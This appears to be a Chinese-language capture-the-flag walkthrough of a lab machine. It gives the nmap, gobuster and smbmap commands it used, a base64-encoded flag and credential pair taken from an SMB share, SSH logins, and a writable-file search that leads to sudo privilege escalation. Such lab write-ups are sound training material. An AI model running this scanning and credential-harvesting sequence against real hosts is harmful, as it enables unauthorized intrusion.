靶机设置
没有特殊设置
Nmap扫描
主机发现
sudo nmap -sn 192.168.9.0/24
新增IP为靶机IP:192.168.9.157
TCP开放端口扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.9.157
22,80,139,445
UDP开放端口扫描
sudo nmap -sU --min-rate 10000 -p- 192.168.9.157
TCP详细信息扫描
sudo nmap -sT -sV -SC -O -p22,80,139,445 192.168.9.157
linux ( ubuntu? )+apache
smb有信息
vuln漏洞脚本扫描
sudo nmap --script=vuln -p22,80,139,445 192.168.9.157
没有可利用的Qaq
Getshell
80-界面
F12也没啥东西。就一个follow the wave
直接目录扫描吧
sudo gobuster dir -u http://192.168.9.157/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
诶?也没啥东西。
smb
sudo smbmap -H 192.168.9.157
诶,wave,read only。速速读取!
密码直接按回车就行
第一行一眼base64,解码看看:
echo -e "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K" | base64 -d
拿到一组用户名密码,试试ssh
ssh wavex@192.168.9.157
成功登陆
提权
基础信息
提权尝试
find / -writable -type f 2>/dev/null ! -path '/proc/*'
拿到了另一个用户的账号密码,ssh登陆
用户间横向移动
三个ALL直接拿下